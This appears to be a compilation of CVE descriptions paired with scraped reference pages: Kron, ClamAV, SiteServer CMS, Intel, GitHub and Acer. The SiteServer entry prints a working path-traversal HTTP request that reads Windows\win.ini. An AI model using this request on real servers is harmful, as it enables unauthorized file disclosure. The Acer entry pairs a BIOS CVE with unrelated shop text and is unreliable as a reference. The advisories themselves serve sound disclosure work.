Improper Input Validation, Authorization Bypass Through User-Controlled Key vulnerability in Kron Tech Single Connect on Windows allows Privilege Abuse.This issue affects Single Connect: 2.16.

**Description:** A security vulnerability known as IDOR (Insecure Direct Object Reference) has been discovered in Remote Desktop Protocol (RDP) connections. This vulnerability allowed unauthorized access to target devices by manipulating the encoded URL used in the connection. To exploit this vulnerability, all information in the encoded URL and the values stored in Single Connect had to be correct and in the correct order.

**Affected Release:** Single Connect 2.16

**Resolution:** Immediate action was taken to resolve the issue and the problem was fixed in the Single Connect 2.16.1 release. The resolution involved addressing the vulnerability and implementing measures to prevent a similar situation from happening in future releases. The quick response to this vulnerability ensured that the security of RDP connections was maintained, and users could continue using the service without any interruption.

**Update Instructions:** To update the RDP package and copy it to the correct path, follow these steps:

1.  Download the latest RDP package from this link. (md5sum: 6fea2b58915854b663f43fdf4516522a) @
    
2.  Copy the package to Single Connect server.
    
3.  Open a terminal, stop the web server application using the following command: systemctl stop netright-tomcat
    
4.  Navigate to the directory where the package is uploaded.
    
5.  Extract the contents of the package using the following command: tar -xvzf rdp-fix.tar.gz
    
6.  Navigate to the extracted directory using the following command: cd rdp-fix
    
7.  Copy the contents of the extracted directory to the related path using the following command: cp rdp-ui.war /u01/netright-tomcat/webapp
    
8.  Restart the web server application using the following command: systemctl start netright-tomcat
    
9.  Verify the installation by accessing the target server using RDP proxy.

CVE-2023-0882: UPDATE PATCH [RDP Proxy IDOR Vulnerability] - Kron Docs

Cisco has rolled out security updates to address a critical flaw reported in the ClamAV open source antivirus engine that could lead to remote code execution on susceptible devices.
Tracked as CVE-2023-20032 (CVSS score: 9.8), the issue relates to a case of remote code execution residing in the HFS+ file parser component.
The flaw affects versions 1.0.0 and earlier, 0.105.1 and earlier, and

Sysadmin / Endpoint Security

Cisco has rolled out security updates to address a critical flaw reported in the ClamAV open source antivirus engine that could lead to remote code execution on susceptible devices.

Tracked as CVE-2023-20032 (CVSS score: 9.8), the issue relates to a case of remote code execution residing in the HFS+ file parser component.

The flaw affects versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier. Google security engineer Simon Scannell has been credited with discovering and reporting the bug.

"This vulnerability is due to a missing buffer size check that may result in a heap buffer overflow write," Cisco Talos said in an advisory. "An attacker could exploit this vulnerability by submitting a crafted HFS+ partition file to be scanned by ClamAV on an affected device."

Successful exploitation of the weakness could enable an adversary to run arbitrary code with the same privileges as that of the ClamAV scanning process, or crash the process, resulting in a denial-of-service (DoS) condition.

The networking equipment said the following products are vulnerable -

*   Secure Endpoint, formerly Advanced Malware Protection (AMP) for Endpoints (Windows, macOS, and Linux)
*   Secure Endpoint Private Cloud, and
*   Secure Web Appliance, formerly Web Security Appliance

It further confirmed that the vulnerability does not impact Secure Email Gateway (formerly Email Security Appliance) and Secure Email and Web Manager (formerly Security Management Appliance) products.

Also patched by Cisco is a remote information leak vulnerability in ClamAV's DMG file parser (CVE-2023-20052, CVSS score: 5.3) that could be exploited by an unauthenticated, remote attacker.

"This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection," Cisco noted. "An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device."

It's worth pointing out that CVE-2023-20052 does not affect Cisco Secure Web Appliance. That said, both vulnerabilities have been addressed in ClamAV versions 0.103.8, 0.105.2, and 1.0.1.

Cisco separately also resolved a denial-of-service (DoS) vulnerability impacting Cisco Nexus Dashboard (CVE-2023-20014, CVSS score: 7.5) and two other privilege escalation and command injection flaws in Email Security Appliance (ESA) and Secure Email and Web Manager (CVE-2023-20009 and CVE-2023-20075, CVSS scores: 6.5).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical RCE Vulnerability Discovered in ClamAV Open-Source Antivirus Software

SiteServerCMS 7.1.3 sscms has a file read vulnerability.

Vulnerability conditions  
SSCMS v7.1.3 +mysql+administrator privileges  
Vulnerability details

1.  Code analysis found /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=  
    An arbitrary file read vulnerability exists in the interface  
    code analysis process  
    \\SSCMS.Web\\Controllers\\Admin\\Cms\\Templates\\TemplatesAssetsEditorController.Get.cs  
    Enter and find that the FileName parameter is controllable and there is no filtering to pass into the ReadTextAsync method

The entry method discovery is to read out the cultural content, resulting in a file read vulnerability.  

Vulnerability verification  
An exp packet occurs after logging in to the background to obtain administrator credentials  
GET /api/admin/cms/templates/templatesAssetsEditor?directoryPath=&fileName=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini&fileType=html&siteId=1 HTTP/1.1 Host: 192.168.3.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.9 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8 Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I Referer: http://192.168.3.129/ss-admin/cms/templatesAssetsEditor/?siteId=1&directoryPath=&fileName=&fileType=html&tabName=dd25719b-c34e-40df-883f-6a991a23d826 Accept-Encoding: gzip

CVE-2022-44299: background file reading · Issue #3491 · siteserver/cms

Insufficient control flow management in some Intel(R) Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Ethernet Controller Administrative Tools Drivers Advisory**

**Summary: **

A potential security vulnerability in some Intel® Ethernet Controller Administrative Tools drivers for Windows may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.  
 

**Vulnerability Details:**

CVEID: CVE-2022-27808

Description: Insufficient control flow management in some Intel(R) Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.3 Medium

**Affected Products:**

Intel® Ethernet Controller Administrative Tools drivers for Windows before version 1.5.0.2.  
 

**Recommendations:**

Intel recommends updating Intel® Ethernet Controller Administrative Tools drivers for Windows to version 1.5.0.2 or later, which is included for download in the Intel® Administrative Tools for Intel® Network Adapters version 27.6 or later.

Updates are available for download at these locations:

*   Intel® Administrative Tools for Intel® Network Adapters:  
    https://www.intel.sg/content/www/xa/en/download/2593/administrative-tools-for-intel-network-adapters.html.
*   Intel® Ethernet Adapter Complete Driver Pack:  
    https://www.intel.com/content/www/us/en/download/15084/739627/intel-ethernet-adapter-complete-driver-pack.html  
     

**Acknowledgements:**

The issue was found externally.  Intel would like to thank Aobo Wang of Chaitin Security Research Lab (CVE-2022-27808) for reporting the issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-27808: INTEL-SA-00761

A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.6. This vulnerability was reported via the GitHub Bug Bounty program.

CVE-2023-22380: Release notes - GitHub Enterprise Server 3.7 Docs

Uncontrolled search path in some Intel(R) QAT drivers for Windows before version 1.6 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® QAT Drivers Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® QuickAssist Technology (QAT) drivers may allow escalation of privilege.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-36397

Description: Incorrect default permissions in the software installer for some Intel(R) QAT drivers for Linux before version 4.17 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.3 High

Description: Uncontrolled search path in some Intel(R) QAT drivers for Windows before version 1.6 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H  
 

**Affected Products:**

Intel recommends updating Intel® QAT drivers for Linux to version 4.17 or later.

*   Updates are available for download at this location:  
    https://downloadmirror.intel.com/738667/QAT.L.4.18.1-00001.tar.gz

Intel recommends updating Intel® QAT drivers for Windows to version 1.6 or later.

*   Updates are available for download at this location:  
    https://www.intel.com/content/www/us/en/download/19732/intel-quickassist-technology-driver-for-windows-hw-version-1-7.html  
     

**Acknowledgements:**

Intel would like to thank Greg Thomas (CVE-2022-36397) and Marius Gabriel Mihai (CVE-2022-37340) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-37340: INTEL-SA-00751

Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® SGX SDK Advisory**

**Summary: **

Potential security vulnerabilities in the Intel® Software Guard Extensions (SGX) Software Development Kit (SDK) may allow information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-26509

Description: Improper conditions check in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

Description: Insufficient control flow management for the Intel(R) SGX SDK software for Linux before version 2.16.100.1 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 2.5 Low

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N  
 

**Affected Products:**

Intel® SGX SDK software for Linux before version 2.16.100.1.

Intel® SGX SDK software for Windows before version 2.15.100.1.  
 

**Recommendations:**

Intel recommends updating Intel® SGX SDK software for Linux to version 2.16.100.1 or later.

*   Updates are available for download at this location:  
    https://download.01.org/intel-sgx/sgx-linux/

Intel recommends updating Intel® SGX SDK software for Windows to version 2.15.100.1 or later.

*   Updates are available for download at this location:  
    https://registrationcenter.intel.com/en/products/download/3407/  
     

**Acknowledgements:**

Intel would like to thank Jo Van Bulck, Fritz Alder, Frank Piessens, and David Oswald for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26509: INTEL-SA-00677

Stack overflow vulnerability in Aspire E5-475G 's BIOS firmware, in the FpGui module, a second call to GetVariable services allows local attackers to execute arbitrary code in the UEFI DXE phase and gain escalated privileges.

**

KARNEVAALITARJOUS

JOPA -30 %

**

SÄÄSTÄ

**Acerin kansainvälinen lehdistötilaisuus 2023**

Katso kooste

**Make Your Green Mark**

Tutustu ympäristöystävälliseen Acer Vero -valikoimaan

Explore

**Selaa suosittuja kategorioita**

*   **Kannettavat**
    
*   **Pöytätietokoneet**
    
*   **Näytöt**
    
*   **Projektorit**
    
*   **Chromebookit**
    
*   **Lisävarusteet**
    

*   **Parhaat tarjoukset**
    
    Tutustu Acerin virallisen verkkokaupan erikoistarjouksiin. Säästä rahaa ja hanki parasta tekniikkaa.
    
    Osta nyt
    
*   **YRITYSKUUKAUSI**
    
    10 % ALENNUSTA KAIKISTA TUOTTEISTA
    
    SÄÄSTÄ
    

*   **Windows 11**
    
    Esittelyssä Windows 11
    
    Lisätietoja
    
*   **Project Humanity**
    
    Sosiaalisen vaikutuksen laajentaminen
    
    Lisätietoja
    
*   **Acer Vero**
    
    Vihreät tietokonetuotteet
    
    Lisätietoja
    
*   **Acerin antimikrobiset ratkaisut**
    
    Nykyaikaista suojausta
    
    Lisätietoja

CVE-2022-40080: Acerin kannettavat, pöytäkoneet, Chromebookit, monitorit ja projektorit | Acer Suomi

Uncontrolled search path in some Intel(R) Quartus(R) Prime Pro and Standard Edition software may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® FPGA SDK for OpenCL™ Intel® Quartus® Prime Pro Software Advisory**

**Summary:**

Potential security vulnerabilities in the Intel® FPGA SDK for OpenCL™ Intel® Quartus® Prime Pro software may allow escalation of privilege.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-37329

Description: Uncontrolled search path in some Intel(R) Quartus(R) Prime Pro and Standard Edition software may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2022-34157

Description: Improper access control in the Intel(R) FPGA SDK for OpenCL(TM) with Intel(R) Quartus(R) Prime Pro Edition software before version 22.1 may allow authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

**Affected Products:**

Intel® FPGA SDK for OpenCL™ with Intel® Quartus® Prime Pro Edition software before version 22.1.

Intel® Quartus® Prime Pro Edition software before version 21.3.

Intel® Quartus® Prime Standard Edition software before version 21.1.  
 

**Recommendation:**

Intel recommends updating to the versions below.

Intel® Quartus® Prime Pro Edition software to version 21.3 or later at:  

https://fpgasoftware.intel.com/21.3/?edition=pro&platform=windows

Intel® Quartus® Prime Standard Edition Design Software to version 21.1 or later at:

https://fpgasoftware.intel.com/21.1/?edition=standard&platform=windows

Intel® FPGA SDK for OpenCL™ Pro Edition to version 22.1 or later at:

https://fpgasoftware.intel.com/22.1/?edition=pro&platform=windows  
 

**Acknowledgements:**

Intel would like to thank Marius Gabriel Mihai CVE-2022-37329,  Intel employee CVE-2022-34157.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-37329: INTEL-SA-00728

Uncaught exception in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1436(v2) may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Iris® Xe MAX Advisory**

**Summary: **

Potential security vulnerabilities in the Intel® Iris® Xe MAX drivers for Windows may allow denial of service or information disclosure.  Intel is releasing software updates to mitigate these potential vulnerabilities.  
 

**Vulnerability Details:**

CVEID: CVE-2022-30531

Description: Out-of-bounds read in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1474 may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.4 Medium  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2022-34849

Description: Uncaught exception in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1436(v2) may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 4.4 Medium  

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H  
 

**Affected Products:**

Intel® Iris® Xe MAX drivers for Windows before version 100.0.5.1474.  
 

**Recommendations:**

Intel recommends updating Intel® Iris® Xe MAX drivers for Windows to version 100.0.5.1474 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/products/sku/211013/intel-iris-xe-max-graphics-96-eu/downloads.html  
 

**Acknowledgements:**

Intel would like to thank Ilan Wachtel (CVE-2022-30531) and Ling Cui (CVE-2022-34849) for reporting these issues.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

02/14/2023

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#windows